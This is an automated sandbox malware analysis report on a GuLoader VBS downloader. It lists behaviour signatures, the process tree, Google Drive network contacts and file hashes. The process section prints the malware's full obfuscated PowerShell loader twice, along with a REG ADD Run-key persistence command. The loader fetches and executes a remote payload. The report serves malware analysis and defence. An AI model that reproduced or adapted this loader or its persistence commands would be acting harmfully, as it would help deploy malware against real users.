Malware Analysis Report

2025-06-16 03:44

Sample ID 240325-bymqysfc6s
Target 7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs
SHA256 7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e
Tags
guloader downloader persistence evasion trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e

Threat Level: Known bad

The file 7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence evasion trojan

Guloader,Cloudeye

UAC bypass

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry key

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-25 01:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-25 01:33

Reported

2024-03-25 01:35

Platform

win7-20240221-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)" C:\Windows\SysWOW64\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1008 set thread context of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2280 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1412 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2216 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1008 wrote to memory of 2956 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 2664 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2664 wrote to memory of 2704 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
GB 172.217.169.78:443 drive.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 bb73ae965421adb39987483611b65dde
SHA1 0e938488972a3e233cb9529f612a47c92921e725
SHA256 56963d19c5498232698d63f748aa585fbcd502e477600de060ab1fe86dc7735c
SHA512 251b7b8eae9ac4a426f2701c01de2fa517252af39fd0ea632dc6ef7caebf514ed0c195ad8b93b78ab6e25840d04751b288648de6683e4841fe73cedefef0bf0c

memory/2280-275-0x000000001B8E0000-0x000000001BBC2000-memory.dmp

memory/2280-276-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2280-277-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

memory/2280-278-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-279-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

memory/2280-280-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-282-0x0000000002990000-0x00000000029B2000-memory.dmp

memory/2280-281-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-283-0x0000000002930000-0x0000000002942000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N0B18U0TWDLAZW3EG748.temp

MD5 503dce2c5147c859e82aea8d76eacdb1
SHA1 c13736860fe262c146e144fd4994f239dce5bbc4
SHA256 25b86b3ce5ab1d739fe5b31ad299df96726fd1a5cf332a3faec7d8178cbdc4a6
SHA512 46c38a9f888d09464f74b249f5bedcb28916894ce6e41ae3620c1654274cef13b19f1646f457832cd001214803836c40ab6534b723a86313c2ee920d9749ffce

memory/1008-286-0x0000000072FC0000-0x000000007356B000-memory.dmp

memory/1008-288-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1008-287-0x0000000002910000-0x0000000002950000-memory.dmp

memory/1008-289-0x0000000072FC0000-0x000000007356B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d9fdce3a5f6b9359d020211ed4805dfd
SHA1 bb54b3fe183ac51ad00ffbbe00b40756e988d8fd
SHA256 c9cf135ac22fafa9fda4b285ebefba701a46de9b25c120497b5aa76cfcef0276
SHA512 a8a088f9acb8621b206a32739314dc009e691afc0ea55c612798ee3c38bb0c5f86247a0f45fb8364a13261ebd4178fc35c93263c7122ddb46a07514cf4c31cfd

C:\Users\Admin\AppData\Local\Temp\Cab28E4.tmp

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

memory/1008-301-0x0000000002910000-0x0000000002950000-memory.dmp

memory/2280-302-0x000007FEF53E0000-0x000007FEF5D7D000-memory.dmp

memory/2280-303-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-305-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-306-0x0000000002000000-0x0000000002080000-memory.dmp

memory/2280-307-0x0000000002000000-0x0000000002080000-memory.dmp

memory/1008-304-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/1008-308-0x0000000005670000-0x0000000005671000-memory.dmp

memory/1008-309-0x0000000006850000-0x0000000009B0B000-memory.dmp

memory/1008-310-0x0000000072FC0000-0x000000007356B000-memory.dmp

